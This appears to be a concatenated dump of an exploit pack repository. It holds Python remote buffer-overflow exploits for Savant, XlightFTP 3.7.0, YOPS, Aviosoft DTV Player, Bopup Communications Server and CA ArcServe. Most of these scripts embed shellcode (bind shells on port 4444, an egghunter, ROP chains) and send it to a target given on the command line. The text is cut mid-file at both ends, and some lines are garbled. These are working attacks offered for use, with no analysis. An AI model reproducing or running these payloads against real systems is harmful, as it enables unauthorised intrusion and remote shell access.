12 | "\x59\x49\xc2\xff\x91\x58\x90\x5d\x29\xec\xb0\x10\xb1\x92\xd3"
13 | "\xae\x07\xc5\x35\x4d\x38\xf3\xdb\x06\xfc\xec\x5f\xa5\x66\x93"
14 | "\xcc\x5d\x07\x81\xcb\xcc\x59\x35\x45\xd6\x2d\x15\xa1\xe7\xbb"
15 | "\xd6\x5d\x68\x57\x1b\x2a\x4f\xe8\xdd\xd3\xc0\x84\x0c\x0e\xb7"
16 | "\x03\x24\xc7\xfd\xd2\xa5\x88\x89\xf8\x07\x82\x1b\xcb\x2d\x3b"
17 | "\xfd\x9d\x67\xa9\xff\xe9\x20\x9e\xa9\x25\x8b\x7c\xda\xd9\x01"
18 | "\x32\x51\x36\x9a\xe7\x73\x8f\xe5\xea\x60\xa6\x4c\x78\xef\xbb"
19 | "\x1e\x37\xd0\xbd\xaa\x4f\xe7\x94\x3e\x02\x34\x21\xc6\xc1\xe2"
20 | "\xa3\x6f\x76\x92\x9a\xed\xda\x19\x2d\xca\x21\xb2\xb0\xa9\xb5"
21 | "\x72\xa1\xbb\xd0\x18\x64\xd3\xb4\x85\x0c\x92\xf7\x07\xcf\x13"
22 | "\xc2\x95\x57\x0a\x68\x6d\x94\x6f\x5a\xad\xd1\x82\x26\x9f\x3c"
23 | "\x0d\x2b\xdc\x06\x6a\xd3\x87\x24\x9c\x14\x58\x71\x42\xef\x1b"
24 | "\x90\xdc\x46\x67\x51\xd3\x4c\xc4\x11\x23\x29\xbd\xc5\xab\x96"
25 | "\x54\x5e\xb6\x08\x60\x42\x5f\x7a\x76\xdf\x30\x05\x76\xb7\xd1"
26 | "\xf2\x49\xba\x14\x69\xa7\x7b\xa8\x6b\xb9\xad\xc8\x8e\x0f\x9e"
27 | "\x07\x7f\xa7\x89\x9b\x4d\x68\xbd\x45\x77\xe0\x64\xec\xa2\x18"
28 | "\x2d\x6f\x10\xc3\x14\x1d\x4e\x92\x3a\x8a\xf0\xd8\x07\x12\x19"
29 | "\x27\x0c\x23\xe4\x0b\xbb\x6d\x97\xf8\xe8\x8c\x23\xb5\xe0\x22"
30 | "\xe8\x70\x85\x10\xbb\x64\xbe\x09\x41\xe7\x2d\x6d\x39\xfb\xcc"
31 | "\x09\xee\xca\x8f\x83\x22\x5d\x77\x2b\x5b\xc6\x1b\x82\x6e\x17"
32 | "\x03\xe8\x6c\x35\x55\x71\xd4\x35\x72\x12\x3f\x11\x6e\xcf\x09"
33 | "\x5a\xd0\x33\x40\x8e\x3f\x36\xbf\xd7\xd0\x85\x17\x03\xd3\xc4"
34 | "\x7f\x17\x6e\xe8\x0d\xa6\x5f\x9e\xd6\x1b\xf4\x2b\x8c\xb3\xad"
35 | "\x19\xb3\x70\xac\x56\x76\x0c\xfb\x4f\xc4\x99\xdd\x99\x75\x8f"
36 | "\xa8\xfa\x91\x5c\xfb\x26\xbd\x8a\xea\xec\x0d\xf1\x45\x4f\x72"
37 | "\xd1\x02\x47\x9c\xa5\x33\x1e\xf8\xc7\x00\xd2\x3d\x86\xb4\x7c"
38 | "\xb9\x85\x5f\x8c\x40\x58\x7e\x7c\x5d\x76\x3a\xd6\x0b\x9e\xfe"
39 | "\x88\xc7\x60\x56\x99\x19\x7f\x7a\xda\x93\x72\x99\x3f\x69")
40 |
41 | badbuffer = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x52\x30\x63\x58\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" # egghunter searching for R0cX
42 | badbuffer += "\x90" * (254 - len(badbuffer))
43 | badbuffer += "\x09\x1D\x40" # EIP Overwrite 00401D09 savant.exe POP EBP, RETN
44 | httpmethod = "\xb0\x03\x04\x01\x7B\x14" # MOV AL, 3; ADD AL, 1; JPO 14
45 |
46 | sendbuf = httpmethod + " /%" + badbuffer + '\r\n\r\n' + buffer2
47 |
48 | sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
49 | connect=sock.connect((target_address,target_port))
50 | sock.send(sendbuf)
51 | sock.close()
--------------------------------------------------------------------------------
/Exploit Pack/exploits/code/XlightServer3.7.0.py:
--------------------------------------------------------------------------------
1 | ###
2 | # Title : XlightFTP Server v3.7.0 Remote Root BOF Exploit
3 | # Author : KedAns-Dz
4 | # E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com | kedans@facebook.com
5 | # Home : Hassi.Messaoud (30008) - Algeria -(00213555248701)
6 | # Web Site : www.1337day.com * www.exploit-id.com * www.dis9.com
7 | # Facebook : http://facebook.com/KedAns
8 | # platform : windows
9 | # Impact : Remote Root Exploit & Buffer Overflow (in version 3.7.0)
10 | # Tested on : Windows XP SP3 (Fr)
11 | ##
12 | # [Indoushka & SeeMe] => Welcome back Br0ther's <3 ^^ <3
13 | ##
14 | # | >> --------+++=[ Dz Offenders Cr3w ]=+++------- << |
15 | # | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |
16 | # | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * T0xic |
17 | # | ------------------------------------------------ < |
18 | # + All Dz .. This is Open Group 4 L33T Dz Hax3rZ ..
19 | ###
20 |
21 | #----------------[ Exploit Code ]----------=>
22 |
23 | #!/usr/bin/python
24 |
25 | from socket import *
26 | import sys, struct, os, time
27 |
28 | print "\nXlightFTP Server v3.7.0 Remote Root BOF Exploit"
29 | if (len(sys.argv) < 3):
30 | print "\nXlightFTP Server v3.7.0 Remote Root BOF Exploit"
31 | print "\n Usage: %s \n" %(sys.argv[0])
32 | sys.exit()
33 |
34 | print "\n[!] Connecting to %s ..." %(sys.argv[1])
35 |
36 | # connect to host
37 | sock = socket(AF_INET,SOCK_STREAM)
38 | sock.connect((sys.argv[1],int(sys.argv[2])))
39 | sock.recv(1024)
40 | time.sleep(5)
41 | #-------------------------------------------
42 | buffer = "\x41" * 1337 # Junk
43 | buffer += "\x90" * 123 # padding
44 | #-------------------------------------------
45 | # windows/shell_bind_tcp - 368 bytes
46 | # Encoder: x86/shikata_ga_nai (http://www.metasploit.com)
47 | # LPORT=4444, RHOST=192.168.1.2, EXITFUNC=process
48 | buffer += ("\x33\xc9\xbf\xb8\xf7\xfd\xd9\xda\xd8\xd9\x74\x24\xf4\xb1"+
49 | "\x56\x5d\x83\xc5\x04\x31\x7d\x0d\x03\x7d\xb5\x15\x08\x25"+
50 | "\x2d\x50\xf3\xd6\xad\x03\x7d\x33\x9c\x11\x19\x37\x8c\xa5"+
51 | "\x69\x15\x3c\x4d\x3f\x8e\xb7\x23\xe8\xa1\x70\x89\xce\x8c"+
52 | "\x81\x3f\xcf\x43\x41\x21\xb3\x99\x95\x81\x8a\x51\xe8\xc0"+
53 | "\xcb\x8c\x02\x90\x84\xdb\xb0\x05\xa0\x9e\x08\x27\x66\x95"+
54 | "\x30\x5f\x03\x6a\xc4\xd5\x0a\xbb\x74\x61\x44\x23\xff\x2d"+
55 | "\x75\x52\x2c\x2e\x49\x1d\x59\x85\x39\x9c\x8b\xd7\xc2\xae"+
56 | "\xf3\xb4\xfc\x1e\xfe\xc5\x39\x98\xe0\xb3\x31\xda\x9d\xc3"+
57 | "\x81\xa0\x79\x41\x14\x02\x0a\xf1\xfc\xb2\xdf\x64\x76\xb8"+
58 | "\x94\xe3\xd0\xdd\x2b\x27\x6b\xd9\xa0\xc6\xbc\x6b\xf2\xec"+
59 | "\x18\x37\xa1\x8d\x39\x9d\x04\xb1\x5a\x79\xf9\x17\x10\x68"+
60 | "\xee\x2e\x7b\xe5\xc3\x1c\x84\xf5\x4b\x16\xf7\xc7\xd4\x8c"+
61 | "\x9f\x6b\x9d\x0a\x67\x8b\xb4\xeb\xf7\x72\x36\x0c\xd1\xb0"+
62 | "\x62\x5c\x49\x10\x0a\x37\x89\x9d\xdf\x98\xd9\x31\x8f\x58"+
63 | "\x8a\xf1\x7f\x31\xc0\xfd\xa0\x21\xeb\xd7\xd7\x65\x25\x03"+
64 | "\xb4\x01\x44\xb3\x2b\x8e\xc1\x55\x21\x3e\x84\xce\xdd\xfc"+
65 | "\xf3\xc6\x7a\xfe\xd1\x7a\xd3\x68\x6d\x95\xe3\x97\x6e\xb3"+
66 | "\x40\x3b\xc6\x54\x12\x57\xd3\x45\x25\x72\x73\x0f\x1e\x15"+
67 | "\x09\x61\xed\x87\x0e\xa8\x85\x24\x9c\x37\x55\x22\xbd\xef"+
68 | "\x02\x63\x73\xe6\xc6\x99\x2a\x50\xf4\x63\xaa\x9b\xbc\xbf"+
69 | "\x0f\x25\x3d\x4d\x2b\x01\x2d\x8b\xb4\x0d\x19\x43\xe3\xdb"+
70 | "\xf7\x25\x5d\xaa\xa1\xff\x32\x64\x25\x79\x79\xb7\x33\x86"+
71 | "\x54\x41\xdb\x37\x01\x14\xe4\xf8\xc5\x90\x9d\xe4\x75\x5e"+
72 | "\x74\xad\x86\x15\xd4\x84\x0e\xf0\x8d\x94\x52\x03\x78\xda"+
73 | "\x6a\x80\x88\xa3\x88\x98\xf9\xa6\xd5\x1e\x12\xdb\x46\xcb"+
74 | "\x14\x48\x66\xde")
75 | #-------------------------------------
76 | buffer += "\x90" * 8 # more nop's
77 | #-------------------------------------
78 | buffer += "\x07\xd5\xc5\x7c" # jmp esp in shell32.dll (Windows XP SP3 - Universal)
79 | buffer += "\x0a" # end connection
80 | # send buffer
81 | print "[*] Sending Buffer Junk..."
82 | time.sleep(2)
83 | print "[*] Spawn a Backshell Connecting..."
84 | sock.send(buffer)
85 | sock.recv(1024)
86 | sock.close()
87 | print "[+] Exploit succeed. Now NetCat %s on port 4444\n" %(sys.argv[1])
88 | print "\n > Exploit By : KedAns-Dz - Dz Offenders Cr3w - Inj3ct0r Team"
89 | sys.exit()
90 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/code/YourOpenPersonalWEBSERVER_DCA-00015.py:
--------------------------------------------------------------------------------
1 | # Software:
2 | # YOPS (Your Own Personal [WEB] Server) is a small SEDA-like HTTP
3 | #server for Linux OS written in C.
4 | # URL: http://sourceforge.net/projects/yops2009/
5 | #
6 | # Vulnerability: Rodrigo Escobar aka ipax @ DcLabs
7 | # Exploit: Flavio do Carmo Junior aka waKKu @ DcLabs
8 | # Contact: waKKu dclabs com br
9 | #!/usr/bin/python
10 |
11 | #!/usr/bin/python
12 | import sys
13 |
14 | #HOST = "localhost"
15 | HOST = sys.argv[1]
16 | #PORT = 8888
17 | PORT = int(sys.argv[2])
18 | import socket
19 | import sys
20 | import time
21 |
22 | try:
23 | BUFF_LEN = int(sys.argv[3])
24 | except:
25 | BUFF_LEN = 802
26 | FIXUP_ADDR = "\x47\xce\x04\x08"
27 |
28 |
29 | # Shellcode changed for winAUTOPWN by QUAKERDOOMER
30 |
31 | #by Magnefikko
32 | # 05.07.2010
33 | # magnefikko@gmail.com
34 | # Promhyl Studies :: http://promhyl.tk
35 | # Subgroup: #PRekambr
36 | # Name: 97 bytes bind sh@64533
37 | # Platform: Linux x86
38 |
39 | shellcode = ("SHALL BE CHANGED BY WINDOWS AUTOPWN")
40 | #("\x6a\x66\x6a\x01\x5b\x58\x99\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\x6a\x66\x58\x43\x52\x66\x68\xfc\x15\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x6a\x66\x58\x43\x43\x6a\x05\x56\xcd\x80\x6a\x66\x58\x43\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x6a\x3f\x58\x31\xc9\xcd\x80\x6a\x3f\x58\x41\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x99\x50\xb0\x0b\x59\xcd\x80")
41 |
42 |
43 |
44 | buffer = "HEAD "
45 | buffer += "A"*BUFF_LEN
46 | buffer += FIXUP_ADDR*4
47 | buffer += " HTTP/1.1"
48 |
49 | stackadjust = (
50 | "\xcb" # instruction alignment
51 | "\xbc\x69\x69\x96\xb0" # Stack Adjustment
52 | )
53 |
54 | payload = buffer + stackadjust + shellcode + "\r\n\r\n"
55 |
56 | print """
57 | ######################################
58 | ### DcLabs Security Research Group ###
59 | ### +Exploit+ ###
60 | ######################################
61 | Software: YOPS 2009 - Web Server
62 | ---
63 | Vulnerability by: ipax
64 | Exploit by: waKKu
65 | Greetings to: All DcLabs members
66 | """
67 |
68 | print " [+] Using BUFF_LEN -> ", str(BUFF_LEN)
69 |
70 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
71 | print " [+] Trying to establish connection..."
72 | s.connect((HOST, PORT))
73 | print " [+] Sending a dummy request to initialize data..."
74 | s.send("HEAD DcLabs HTTP/1.1\r\n\r\n")
75 | try:
76 | s.recv(1024)
77 | except:
78 | pass
79 | s.close()
80 |
81 | time.sleep(3)
82 |
83 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
84 | s.connect((HOST, PORT))
85 | print " [+] Sending our malicious payload..."
86 | s.send(payload)
87 | print " [+] Payload sent, good luck!"
88 | s.close()
89 |
90 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/code/aviosoftdigital.py:
--------------------------------------------------------------------------------
1 | # Exploit Title: Aviosoft Digital TV Player Professional 1.x Stack Buffer Overflow
2 | # Author: modpr0be
3 |
4 | import struct
5 |
6 | totalsize = 5000
7 | junk = 'A' * 872
8 | align = 'B' * 136
9 |
10 | # aslr, dep bypass using pushad technique
11 | seh = struct.pack(' ebx
26 | rop+= struct.pack(' edx
32 | rop+= struct.pack(' \n" %(sys.argv[0])
19 | sys.exit()
20 |
21 | print "\n[!] Connecting to %s ..." %(sys.argv[1])
22 |
23 | # connect to host
24 | sock = socket(AF_INET,SOCK_STREAM)
25 | sock.connect((sys.argv[1],int(sys.argv[2])))
26 | sock.recv(1024)
27 | time.sleep(5)
28 |
29 | # padding
30 | buffer = "\x90" * 1092
31 |
32 | # 368 bytes shellcode
33 | buffer += ("\x33\xc9\x83\xe9\xaa\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"+
34 | "\xbb\xc1\x9c\x35\x83\xee\xfc\xe2\xf4\x47\x29\x15\x35\xbb\xc1"+
35 | "\xfc\xbc\x5e\xf0\x4e\x51\x30\x93\xac\xbe\xe9\xcd\x17\x67\xaf"+
36 | "\x4a\xee\x1d\xb4\x76\xd6\x13\x8a\x3e\xad\xf5\x17\xfd\xfd\x49"+
37 | "\xb9\xed\xbc\xf4\x74\xcc\x9d\xf2\x59\x31\xce\x62\x30\x93\x8c"+
38 | "\xbe\xf9\xfd\x9d\xe5\x30\x81\xe4\xb0\x7b\xb5\xd6\x34\x6b\x91"+
39 | "\x17\x7d\xa3\x4a\xc4\x15\xba\x12\x7f\x09\xf2\x4a\xa8\xbe\xba"+
40 | "\x17\xad\xca\x8a\x01\x30\xf4\x74\xcc\x9d\xf2\x83\x21\xe9\xc1"+
41 | "\xb8\xbc\x64\x0e\xc6\xe5\xe9\xd7\xe3\x4a\xc4\x11\xba\x12\xfa"+
42 | "\xbe\xb7\x8a\x17\x6d\xa7\xc0\x4f\xbe\xbf\x4a\x9d\xe5\x32\x85"+
43 | "\xb8\x11\xe0\x9a\xfd\x6c\xe1\x90\x63\xd5\xe3\x9e\xc6\xbe\xa9"+
44 | "\x2a\x1a\x68\xd3\xf2\xae\x35\xbb\xa9\xeb\x46\x89\x9e\xc8\x5d"+
45 | "\xf7\xb6\xba\x32\x44\x14\x24\xa5\xba\xc1\x9c\x1c\x7f\x95\xcc"+
46 | "\x5d\x92\x41\xf7\x35\x44\x14\xcc\x65\xeb\x91\xdc\x65\xfb\x91"+
47 | "\xf4\xdf\xb4\x1e\x7c\xca\x6e\x48\x5b\x04\x60\x92\xf4\x37\xbb"+
48 | "\xd0\xc0\xbc\x5d\xab\x8c\x63\xec\xa9\x5e\xee\x8c\xa6\x63\xe0"+
49 | "\xe8\x96\xf4\x82\x52\xf9\x63\xca\x6e\x92\xcf\x62\xd3\xb5\x70"+
50 | "\x0e\x5a\x3e\x49\x62\x32\x06\xf4\x40\xd5\x8c\xfd\xca\x6e\xa9"+
51 | "\xff\x58\xdf\xc1\x15\xd6\xec\x96\xcb\x04\x4d\xab\x8e\x6c\xed"+
52 | "\x23\x61\x53\x7c\x85\xb8\x09\xba\xc0\x11\x71\x9f\xd1\x5a\x35"+
53 | "\xff\x95\xcc\x63\xed\x97\xda\x63\xf5\x97\xca\x66\xed\xa9\xe5"+
54 | "\xf9\x84\x47\x63\xe0\x32\x21\xd2\x63\xfd\x3e\xac\x5d\xb3\x46"+
55 | "\x81\x55\x44\x14\x27\xc5\x0e\x63\xca\x5d\x1d\x54\x21\xa8\x44"+
56 | "\x14\xa0\x33\xc7\xcb\x1c\xce\x5b\xb4\x99\x8e\xfc\xd2\xee\x5a"+
57 | "\xd1\xc1\xcf\xca\x6e\xc1\x9c\x35")
58 |
59 | # more padding
60 | buffer += "\x90" * 8
61 |
62 | # jmp edx (shell32.dll Windows XP SP3 Spanish) (edx points to the 1st nopsled)
63 | buffer += "\x9a\x5c\x3c\x7e"
64 |
65 | # end connection
66 | buffer += "\x0a"
67 |
68 | # send buffer
69 | print "[!] Sending exploit..."
70 | sock.send(buffer)
71 | sock.recv(1024)
72 | sock.close()
73 | print "[!] Exploit succeed. Now netcat %s on port 4444\n" %(sys.argv[1])
74 | sys.exit()
75 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/code/bopup.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | #[*] Usage : python bopup.py [target_ip]
3 | # _ _ _ __ _ _ _
4 | #| || | (_) ___ / \ | |__ | | |
5 | #| __ | | | (_-< | () | | / / |_ _|
6 | #|_||_| |_| /__/ \__/ |_\_\ |_|
7 | #
8 | #[*] Bug : Bopup Communications Server (3.2.26.5460) Remote BOF Exploit (SEH)
9 | #[*] Tested on : Xp sp3 (EN)(VB)
10 | #[*] Refer : mu-b
11 | #[*] Exploited by : His0k4
12 | #[*] Greetings : All friends & muslims HaCkErs (DZ)
13 |
14 |
15 | import socket,sys,struct
16 | from time import *
17 |
18 | host = sys.argv[1]
19 | port = int(sys.argv[2])
20 |
21 | def banner():
22 | print "\n[x] Bopup Communications Server Remote BOF Exploit (SEH)\n"
23 | print "[x] By: His0k4\n"
24 |
25 | # win32_adduser - PASS=27 EXITFUNC=seh USER=dz Size=228 Encoder=PexFnstenvSub http://metasploit.com
26 | # windows/shell_bind_tcp - 696 bytes Encoder: x86/alpha_mixed
27 | # EXITFUNC=seh, LPORT=4444
28 | # shellcode changed for WinAutoPWN
29 | shellcode = ("SHALL BE CHANGED BY WINDOWS AUTOPWN")
30 | "\x89\xe1\xd9\xe1\xd9\x71\xf4\x5d\x55\x59\x49\x49\x49\x49\x49"
31 | "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
32 | "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
33 | "\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
34 | "\x4b\x4c\x43\x5a\x4a\x4b\x50\x4d\x4d\x38\x4c\x39\x4b\x4f\x4b"
35 | "\x4f\x4b\x4f\x45\x30\x4c\x4b\x42\x4c\x46\x44\x46\x44\x4c\x4b"
36 | "\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x45\x51\x4a"
37 | "\x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31"
38 | "\x4a\x4b\x51\x59\x4c\x4b\x50\x34\x4c\x4b\x45\x51\x4a\x4e\x46"
39 | "\x51\x49\x50\x4d\x49\x4e\x4c\x4c\x44\x49\x50\x42\x54\x43\x37"
40 | "\x49\x51\x48\x4a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4b\x44\x47"
41 | "\x4b\x50\x54\x46\x44\x51\x38\x43\x45\x4b\x55\x4c\x4b\x51\x4f"
42 | "\x47\x54\x43\x31\x4a\x4b\x45\x36\x4c\x4b\x44\x4c\x50\x4b\x4c"
43 | "\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x43\x33\x46\x4c\x4c\x4b"
44 | "\x4c\x49\x42\x4c\x47\x54\x45\x4c\x43\x51\x48\x43\x46\x51\x49"
45 | "\x4b\x42\x44\x4c\x4b\x50\x43\x50\x30\x4c\x4b\x47\x30\x44\x4c"
46 | "\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x51\x50\x43\x38\x51"
47 | "\x4e\x43\x58\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f"
48 | "\x49\x46\x42\x46\x46\x33\x43\x56\x42\x48\x47\x43\x47\x42\x42"
49 | "\x48\x42\x57\x44\x33\x46\x52\x51\x4f\x46\x34\x4b\x4f\x4e\x30"
50 | "\x42\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x50\x50\x4b\x4f\x48"
51 | "\x56\x51\x4f\x4c\x49\x4b\x55\x42\x46\x4d\x51\x4a\x4d\x43\x38"
52 | "\x45\x52\x50\x55\x43\x5a\x43\x32\x4b\x4f\x48\x50\x43\x58\x48"
53 | "\x59\x44\x49\x4b\x45\x4e\x4d\x46\x37\x4b\x4f\x48\x56\x46\x33"
54 | "\x51\x43\x51\x43\x50\x53\x46\x33\x50\x43\x50\x53\x51\x53\x50"
55 | "\x53\x4b\x4f\x4e\x30\x45\x36\x42\x48\x42\x31\x51\x4c\x43\x56"
56 | "\x46\x33\x4b\x39\x4d\x31\x4a\x35\x45\x38\x4e\x44\x45\x4a\x42"
57 | "\x50\x49\x57\x51\x47\x4b\x4f\x49\x46\x43\x5a\x44\x50\x50\x51"
58 | "\x46\x35\x4b\x4f\x4e\x30\x42\x48\x4e\x44\x4e\x4d\x46\x4e\x4d"
59 | "\x39\x46\x37\x4b\x4f\x49\x46\x50\x53\x51\x45\x4b\x4f\x4e\x30"
60 | "\x45\x38\x4a\x45\x51\x59\x4c\x46\x51\x59\x46\x37\x4b\x4f\x4e"
61 | "\x36\x50\x50\x50\x54\x46\x34\x46\x35\x4b\x4f\x48\x50\x4d\x43"
62 | "\x43\x58\x4a\x47\x42\x59\x48\x46\x44\x39\x50\x57\x4b\x4f\x4e"
63 | "\x36\x46\x35\x4b\x4f\x48\x50\x43\x56\x42\x4a\x43\x54\x45\x36"
64 | "\x43\x58\x45\x33\x42\x4d\x4c\x49\x4a\x45\x42\x4a\x46\x30\x50"
65 | "\x59\x47\x59\x48\x4c\x4c\x49\x4a\x47\x42\x4a\x50\x44\x4c\x49"
66 | "\x4a\x42\x46\x51\x49\x50\x4a\x53\x4e\x4a\x4b\x4e\x50\x42\x46"
67 | "\x4d\x4b\x4e\x51\x52\x46\x4c\x4c\x53\x4c\x4d\x42\x5a\x46\x58"
68 | "\x4e\x4b\x4e\x4b\x4e\x4b\x45\x38\x42\x52\x4b\x4e\x4e\x53\x44"
69 | "\x56\x4b\x4f\x43\x45\x50\x44\x4b\x4f\x4e\x36\x51\x4b\x50\x57"
70 | "\x50\x52\x50\x51\x46\x31\x50\x51\x42\x4a\x45\x51\x46\x31\x50"
71 | "\x51\x46\x35\x46\x31\x4b\x4f\x48\x50\x45\x38\x4e\x4d\x4e\x39"
72 | "\x43\x35\x48\x4e\x50\x53\x4b\x4f\x48\x56\x43\x5a\x4b\x4f\x4b"
73 | "\x4f\x50\x37\x4b\x4f\x4e\x30\x4c\x4b\x50\x57\x4b\x4c\x4d\x53"
74 | "\x49\x54\x42\x44\x4b\x4f\x4e\x36\x46\x32\x4b\x4f\x4e\x30\x43"
75 | "\x58\x4a\x50\x4c\x4a\x45\x54\x51\x4f\x46\x33\x4b\x4f\x48\x56"
76 | "\x4b\x4f\x4e\x30\x41\x41")
77 |
78 |
79 | payload = '\x01\x00\x00\x00'
80 | payload += '\x41'*(821-len(shellcode))
81 | payload += shellcode
82 | payload += '\x42'*27 #padding
83 | payload += '\xE8\xFC\xFE\xFF\xFF' #Call back
84 | payload += '\x43'*8 #padding, escaping from the \x00 monster :p
85 | payload += '\xEB\xF1\xFF\xFF' #short jump
86 | payload += '\xE0\x14\x40\x00' #p/p/r bcssrvc (universal)
87 |
88 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
89 | try:
90 | s.connect((host,port))
91 | except:
92 | print "Can\'t connect to server!\n"
93 | sys.exit(0)
94 |
95 | s.send(payload+'\r\n')
96 | print("[+] Done!")
97 | s.close()
98 |
99 | # milw0rm.com [2009-06-29]
--------------------------------------------------------------------------------
/Exploit Pack/exploits/code/ca_bof_poc.py:
--------------------------------------------------------------------------------
1 | import socket
2 | import codecs
3 | import random
4 | import sys
5 |
6 | from struct import pack
7 |
8 | from impacket.dcerpc import transport, dcerpc
9 | from impacket import uuid, smb
10 |
11 |
12 | print "CA ArcServe Exploit"
13 | print ""
14 | print "References"
15 | print ""
16 | print "CVE-2008-4397 - Message engine command injection"
17 | print "CVE-2008-4398 - Tape engine denial of service"
18 | print "CVE-2008-4399 - Database engine denial of service"
19 | print "CVE-2008-4400 - Multiple service crash"
20 | print ""
21 | print "Acknowledgement"
22 | print ""
23 | print "CVE-2008-4397 - Haifei Li of Fortinet's FortiGuard Global Security Research Team"
24 | print "CVE-2008-4398 - Vulnerability Research Team of Assurent Secure Technologies, a TELUS Company"
25 | print "CVE-2008-4399 - Vulnerability Research Team of Assurent Secure Technologies, a TELUS Company"
26 | print "CVE-2008-4400 - Greg Linares of eEye Digital Security"
27 | print ""
28 | print "Exploit URL : http://crackinglandia.blogspot.com/2009/10/el-colador-de-ca-computer-associates.html"
29 | print ""
30 |
31 |
32 |
33 | def get_hostname(ip):
34 | smbs = smb.SMB("*SMBSERVER", ip)
35 | return smbs.get_server_name()
36 |
37 | def make_random_string(size):
38 | Str = ""
39 | while (len(Str)< size):
40 | char = random.randint(0x30, 0x7a)
41 | if ((char >= 0x30) & (char< 0x39)) | ((char >= 0x41) & (char< 0x5a)) | ((char >= 0x61) & (char< 0x7a)):
42 | Str += chr(char)
43 | return Str
44 |
45 | def pack_ndr_string(Str):
46 | Str += "\x00"
47 | _str = pack_ndr_long(len(Str)) + pack_ndr_long(0) + pack_ndr_long(len(Str)) + Str + align_ndr_string(Str)
48 | return _str
49 |
50 | def pack_ndr_byte(Str):
51 | return pack("B", Str)
52 |
53 | def pack_ndr_long(Str):
54 | return pack("